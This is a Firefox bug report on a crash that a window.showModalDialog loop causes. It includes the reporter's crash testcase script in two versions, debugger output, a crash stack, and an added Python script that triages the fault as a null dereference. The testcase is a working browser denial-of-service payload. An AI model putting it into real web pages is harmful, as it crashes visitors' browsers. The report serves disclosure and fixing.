Closed Bug 618240 Opened 15 years ago Closed 15 years ago

Crash Using window.showModalDialog() [null deref]

Categories

(Core :: General, defect)

1.9.2 Branch
x86
Windows XP
defect
Not set
critical

Tracking


RESOLVED FIXED
Tracking Status
status2.0 --- unaffected
status1.9.2 --- wanted

People

(Reporter: jordi.chancel, Assigned: jimm)

References


Details

(Keywords: testcase, Whiteboard: [sg:dos][1.9.x branches, fixed on trunk in 557931] Related to window previews, which are now off by default.)

Attachments

(2 files, 3 obsolete files)

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13

Visiting a webpage with a special javascript with some window.showModalDialog(), like:

    <body onload="javascript:crash();"></body>
    <script>
    function crash() {
      var string1 = unescape("%u4141%udead");
      for (i = 0; i < 10000; i++) {
        string1 += string1 + string1;
        window.showModalDialog(string1, string1, "dialogHeight:300px; dialogLeft:200px;");
      }
    }
    </script>

Reproducible: Always

Steps to Reproduce:
1. Go to http://www.alternativ-testing.fr/Research/Mozilla/crash/showModalDialogcrash.htm

Actual Results:
Firefox crashes with Access Violation:

    0:026> g
    (1a38.1ad8): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=000000b4 ebx=00000000 ecx=00000000 edx=00000000 esi=00000002 edi=13292514
    eip=6333d3f9 esp=005fd1a4 ebp=005fd1c8 iopl=0 nv up ei pl nz na po nc
    cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
    *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Mozilla Firefox\xul.dll -
    xul!Hunspell_get_dic_encoding+0x2070:
    6333d3f9 8b00 mov eax,[eax] ds:002b:000000b4=????????
Attached file TestCase1 (obsolete) —
Attachment #496757 - Attachment is obsolete: true
Attached file Testcase1
Excuse me, the perfect testcase is:

    <body onload="javascript:crash();"></body>
    <script>
    function crash() {
      var string1 = unescape("%u0000%udead");
      for (i = 0; i < 10000; i++) {
        string1 += string1 + string1;
        window.showModalDialog(string1, string1, "dialogHeight:300px; dialogLeft:200px;");
      }
    }
    </script>
Allow Popup is needed
Screenshot [Access Violation]
Summary: Crash Using window.showModalDialog() [Access Violation] → Crash Using window.showModalDialog() and window.open() [Access Violation]
Attached file TestCase2 (window.open) (obsolete) —
Attached image ScreenShot [ACCESS_VIOLATION_WRITE] (obsolete) —
Attachment #496767 - Attachment is obsolete: true
Attachment #496768 - Attachment is obsolete: true
The crash with window.open doesn't work now, but window.showModalDialog still does.
Summary: Crash Using window.showModalDialog() and window.open() [Access Violation] → Crash Using window.showModalDialog() [Access Violation]
Keywords: testcase
The original crash is in hunspell, which we're already upgrading (bug 579649 and bug 620626). Is it a bug there or is that somewhat coincidental? If it's a spelling checker problem interspersed nulls--unescape("%u0000%udead")--might mask problems found by unescape("%u4141%udead"). Otherwise I tend to think the problem is the exponential string growth and not really anything to do with modal dialogs.
Whiteboard: [sg:critical?]
+0x2070 is too far to be the actual function; it could be past the edge of the hunspell library, but it probably isn't. However, with WPO it might be possible for the general assumptions to be wrong.
tomcat/marcia, can you try to get a crash on this and post the stack trace? Then we can take a stab at who to assign it to.
Confirmed using Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 http://crash-stats.mozilla.com/report/index/44d19d00-27b5-40a6-ab6f-5334b2110104 Stack is the same as Bug 556524. Will check trunk next
Status: UNCONFIRMED → NEW
Ever confirmed: true
I don't get the crash using Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b9pre) Gecko/20110104 Firefox/4.0b9pre, but I have to force quit. Here is the stack from the 3.6 crash:

    Frame  Module      Signature                                              Source
    0      xul.dll     mozilla::widget::WindowHook::Lookup                    widget/src/windows/WindowHook.cpp:101
    1      xul.dll     mozilla::widget::WindowHook::LookupOrCreate            widget/src/windows/WindowHook.cpp:109
    2      xul.dll     mozilla::widget::WindowHook::AddMonitor                widget/src/windows/WindowHook.cpp:77
    3      xul.dll     mozilla::widget::TaskbarPreview::TaskbarPreview        widget/src/windows/TaskbarPreview.cpp:107
    4      xul.dll     mozilla::widget::TaskbarTabPreview::TaskbarTabPreview  widget/src/windows/TaskbarTabPreview.cpp:62
    5      xul.dll     mozilla::widget::WinTaskbar::CreateTaskbarTabPreview   widget/src/windows/WinTaskbar.cpp:200
    6      xul.dll     NS_InvokeByIndex_P                                     xpcom/reflect/xptcall/src/md/win32/xptcinvoke.cpp:102
    7      xul.dll     XPCWrappedNative::CallMethod                           js/src/xpconnect/src/xpcwrappednative.cpp:2722
    8      xul.dll     XPC_WN_CallMethod                                      js/src/xpconnect/src/xpcwrappednativejsops.cpp:1740
    9      js3250.dll  js_Invoke                                              js/src/jsinterp.cpp:1360
    10     js3250.dll  js_Interpret                                           js/src/jsops.cpp:2240
    11     js3250.dll  js_Invoke                                              js/src/jsinterp.cpp:1368
    12     js3250.dll  js_InternalInvoke                                      js/src/jsinterp.cpp:1423
    13     js3250.dll  JS_CallFunctionValue                                   js/src/jsapi.cpp:5114
    14     xul.dll     nsJSContext::CallEventHandler                          dom/base/nsJSEnvironment.cpp:2197
    15     xul.dll     nsGlobalWindow::RunTimeout                             dom/base/nsGlobalWindow.cpp:8199
    16     xul.dll     nsGlobalWindow::TimerCallback                          dom/base/nsGlobalWindow.cpp:8533
    17     xul.dll     nsTimerImpl::Fire                                      xpcom/threads/nsTimerImpl.cpp:427
    18     xul.dll     nsTimerEvent::Run                                      xpcom/threads/nsTimerImpl.cpp:519
    19     xul.dll     nsThread::ProcessNextEvent                             xpcom/threads/nsThread.cpp:527
    20     xul.dll     NS_ProcessNextEvent_P                                  obj-firefox/xpcom/build/nsThreadUtils.cpp:250
    21     xul.dll     nsXULWindow::ShowModal                                 xpfe/appshell/src/nsXULWindow.cpp:416
    22     xul.dll     nsContentTreeOwner::ShowAsModal                        xpfe/appshell/src/nsContentTreeOwner.cpp:528
    23     xul.dll     nsWindowWatcher::OpenWindowJSInternal
    24     xul.dll     nsWindowWatcher::OpenWindow                            embedding/components/windowwatcher/src/nsWindowWatcher.cpp:425
    25     xul.dll     nsGlobalWindow::OpenInternal
    26     xul.dll     nsGlobalWindow::ShowModalDialog                        dom/base/nsGlobalWindow.cpp:6268
    27     xul.dll     NS_InvokeByIndex_P                                     xpcom/reflect/xptcall/src/md/win32/xptcinvoke.cpp:102
    28     xul.dll     XPCWrappedNative::CallMethod                           js/src/xpconnect/src/xpcwrappednative.cpp:2722
    29     xul.dll     XPC_WN_CallMethod                                      js/src/xpconnect/src/xpcwrappednativejsops.cpp:1740
    30     js3250.dll  js_Invoke                                              js/src/jsinterp.cpp:1360
    31     js3250.dll  js_Interpret                                           js/src/jsops.cpp:2240
    32     js3250.dll  js_Invoke                                              js/src/jsinterp.cpp:1368
    33     js3250.dll  js_InternalInvoke                                      js/src/jsinterp.cpp:1423
    34     js3250.dll  JS_CallFunctionValue                                   js/src/jsapi.cpp:5114
    35     xul.dll     nsJSContext::CallEventHandler                          dom/base/nsJSEnvironment.cpp:2197
    36     xul.dll     nsJSEventListener::HandleEvent                         dom/src/events/nsJSEventListener.cpp:269
    37     xul.dll     nsEventListenerManager::HandleEventSubType             content/events/src/nsEventListenerManager.cpp:1041
    38     xul.dll     nsEventListenerManager::HandleEvent                    content/events/src/nsEventListenerManager.cpp:1147
    39     xul.dll     nsEventTargetChainItem::HandleEventTargetChain         content/events/src/nsEventDispatcher.cpp:310
    40     xul.dll     nsEventDispatcher::Dispatch                            content/events/src/nsEventDispatcher.cpp:573
    41     xul.dll     DocumentViewerImpl::LoadComplete                       layout/base/nsDocumentViewer.cpp:1036
    42     xul.dll     nsDocShell::EndPageLoad                                docshell/base/nsDocShell.cpp:5714
    43     xul.dll     nsCOMPtr_base::assign_from_qi                          obj-firefox/xpcom/build/nsCOMPtr.cpp:98
    44     xul.dll     nsDocShell::OnStateChange                              docshell/base/nsDocShell.cpp:5586
    45     xul.dll     nsDocLoader::FireOnStateChange                         uriloader/base/nsDocLoader.cpp:1314
    46     xul.dll     nsDocLoader::doStopDocumentLoad                        uriloader/base/nsDocLoader.cpp:926
    47     xul.dll     nsDocLoader::DocLoaderIsEmpty                          uriloader/base/nsDocLoader.cpp:802
    48     xul.dll     nsDocLoader::OnStopRequest                             uriloader/base/nsDocLoader.cpp:697
    49     xul.dll     nsLoadGroup::RemoveRequest                             netwerk/base/src/nsLoadGroup.cpp:680
    50     xul.dll     xul.dll@0x985637
    51     xul.dll     nsDocument::UnblockOnload                              content/base/src/nsDocument.cpp:7119
    52     xul.dll     nsDocument::DispatchContentLoadedEvents                content/base/src/nsDocument.cpp:4077
    53     nspr4.dll   PR_ExitMonitor                                         nsprpub/pr/src/threads/prmon.c:132
    54     xul.dll     nsRunnableMethod<nsHttpChannel,void>::Run              obj-firefox/dist/include/nsThreadUtils.h:282
    55     xul.dll     NS_ProcessNextEvent_P                                  obj-firefox/xpcom/build/nsThreadUtils.cpp:250
    56     xul.dll     nsXULWindow::ShowModal                                 xpfe/appshell/src/nsXULWindow.cpp:416
    57     xul.dll     nsContentTreeOwner::ShowAsModal                        xpfe/appshell/src/nsContentTreeOwner.cpp:528
    58     xul.dll     nsWindowWatcher::OpenWindowJSInternal
Keywords: stackwanted
status1.9.1: --- → ?
status2.0: --- → ?
Jim, can you look into this? Looks like windows widget code per Marcia's stack above.
Assignee: nobody → jmathies
blocking2.0: --- → betaN+
Window previews have been disabled by default, so this doesn't need to hard-block, and may not need to block at all.
status1.9.1: ? → ---
status2.0: ? → ---
Whiteboard: [sg:critical?] → [sg:critical?][softblocker] Related to window previews, which are now off by default.
This crash occurs in 3.6 only, with taskbar tab previews disabled. So it's important to fix, but I don't see why it's blocking the 4.0 release? It should be blocking a 1.9.2 release. Looks like one of our WindowsHook patches, or some other patch, fixed this on trunk. I'll see if I can track this down.
(In reply to comment #18)
> This crash occurs in 3.6 only, with taskbar tab previews disabled. So it's
> important to fix, but I don't see why it's blocking the 4.0 release? It should
> be blocking a 1.9.2 release.
>
> Looks like one of our WindowsHook patches, or some other patch, fixed this on
> trunk. I'll see if I can track this down.

My mistake, it is only seen when previews are enabled, you just don't see them with this test case as they don't get created while it's running. The patch that fixes this is in bug 557931, I've requested approval there for 1.9.2.14.
Depends on: 557931
Removing betaN blocking status.
blocking2.0: betaN+ → ---
Nominating for 1.9.2 to ensure we track this. Thanks Jim!
blocking1.9.2: --- → ?
blocking1.9.2: ? → needed
Whiteboard: [sg:critical?][softblocker] Related to window previews, which are now off by default. → [sg:critical?][1.9.x branches, fixed on trunk in 557931] Related to window previews, which are now off by default.
Version: unspecified → 1.9.2 Branch
The fix in bug 557931 is a null check, and the stack looks like a null deref (vtable+offset). I think I was over worried in comment 11 -- is there a vulnerability here?
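The reasoning in the comment above (a fault at a small address, reached through a vtable or field offset on a null object, is a denial of service rather than a corruption primitive) is what turns the `[sg:critical?]` tag into `[sg:dos]`. The following is an added triage script, not code from this bug or from Mozilla, that applies that rule to the windbg output from comment 0. The input text is the bug's own register dump reflowed one item per line; the 64 KiB null-page bound and the 4 KiB "export symbol too far away" threshold (the point comment 12 makes about `+0x2070`) are assumptions chosen for the example.

```python
import re

# Constructed sample input: the first-chance exception from comment 0 of this
# bug, reflowed one item per line (the values are the bug's, the layout is mine).
WINDBG_OUTPUT = """\
(1a38.1ad8): Access violation - code c0000005 (first chance)
eax=000000b4 ebx=00000000 ecx=00000000 edx=00000000 esi=00000002 edi=13292514
eip=6333d3f9 esp=005fd1a4 ebp=005fd1c8 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
xul!Hunspell_get_dic_encoding+0x2070:
6333d3f9 8b00 mov eax,[eax] ds:002b:000000b4=????????
"""

# Assumptions (not from the page): 32-bit Windows never maps the lowest 64 KiB,
# so a fault below that is a null pointer plus a field/vtable offset; and an
# export-symbol offset above 4 KiB is too far to trust the symbol name.
NULL_PAGE_LIMIT = 0x10000
UNTRUSTED_SYMBOL_OFFSET = 0x1000

REG_RE = re.compile(r"\b(e[a-d]x|e[sd]i|e[bs]p|eip)=([0-9a-f]{8})")
FAULT_RE = re.compile(r"\b[cdefgs]s:[0-9a-f]{4}:([0-9a-f]{8})=")
INSN_RE = re.compile(
    r"^[0-9a-f]{8}\s+[0-9a-f]+\s+(\w+)\s+(.*?)\s+[cdefgs]s:[0-9a-f]{4}:", re.M)
SYM_RE = re.compile(r"^(\w+)!(\w+)\+0x([0-9a-f]+):", re.M)


def parse_windbg(text):
    """Pull registers, faulting address, instruction and symbol out of a windbg dump."""
    regs = {name: int(val, 16) for name, val in REG_RE.findall(text)}
    fault = FAULT_RE.search(text)
    insn = INSN_RE.search(text)
    sym = SYM_RE.search(text)
    return {
        "regs": regs,
        "fault_addr": int(fault.group(1), 16) if fault else None,
        "mnemonic": insn.group(1) if insn else None,
        "operands": insn.group(2) if insn else "",
        "module": sym.group(1) if sym else None,
        "symbol": sym.group(2) if sym else None,
        "symbol_offset": int(sym.group(3), 16) if sym else None,
    }


def triage(parsed):
    """Classify the access violation the way the thread does: near-null => DoS."""
    addr = parsed["fault_addr"]
    if addr is None:
        return {"verdict": "no faulting address found", "near_null": False,
                "access": None, "culprit": [], "symbol_trusted": False}
    # A bracketed destination operand means the faulting access is a write;
    # "mov eax,[eax]" has the memory operand on the source side, so it's a read.
    dest = parsed["operands"].split(",")[0]
    access = "write" if "[" in dest else "read"
    near_null = addr < NULL_PAGE_LIMIT
    # Which register carried the bad pointer (here eax equals the faulting address).
    culprit = [r for r, v in parsed["regs"].items() if v == addr and r != "eip"]
    if near_null:
        verdict = (f"null-pointer {access} at offset 0x{addr:x} of a null object via "
                   f"{', '.join(culprit) or 'unknown register'}: denial of service, "
                   "not a memory-corruption primitive")
    else:
        verdict = f"{access} fault at 0x{addr:08x}: needs further analysis"
    # Export-symbol names with a huge offset (comment 12's point) should not be
    # used to attribute the crash to a component; fetch real symbols instead.
    symbol_trusted = (parsed["symbol_offset"] is not None
                      and parsed["symbol_offset"] <= UNTRUSTED_SYMBOL_OFFSET)
    return {"verdict": verdict, "near_null": near_null, "access": access,
            "culprit": culprit, "symbol_trusted": symbol_trusted}


if __name__ == "__main__":
    result = triage(parse_windbg(WINDBG_OUTPUT))
    print(result["verdict"])
    if not result["symbol_trusted"]:
        print("symbolization unreliable: resolve with proper PDBs before assigning")
```

On the comment 0 dump this reports a read of offset 0xb4 from a null object through `eax` and flags the `Hunspell_get_dic_encoding+0x2070` attribution as untrustworthy, which matches both the eventual `[sg:dos]` rating and the later crash-stats stack that puts the fault in `WindowHook::Lookup` rather than in hunspell.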
Whiteboard: [sg:critical?][1.9.x branches, fixed on trunk in 557931] Related to window previews, which are now off by default. → [1.9.x branches, fixed on trunk in 557931] Related to window previews, which are now off by default.
Group: core-security
Whiteboard: [1.9.x branches, fixed on trunk in 557931] Related to window previews, which are now off by default. → [sg:dos][1.9.x branches, fixed on trunk in 557931] Related to window previews, which are now off by default.
fixed by bug 557931
Status: NEW → RESOLVED
Closed: 15 years ago
Resolution: --- → FIXED
Summary: Crash Using window.showModalDialog() [Access Violation] → Crash Using window.showModalDialog() [null deref]
blocking1.9.2: needed → ---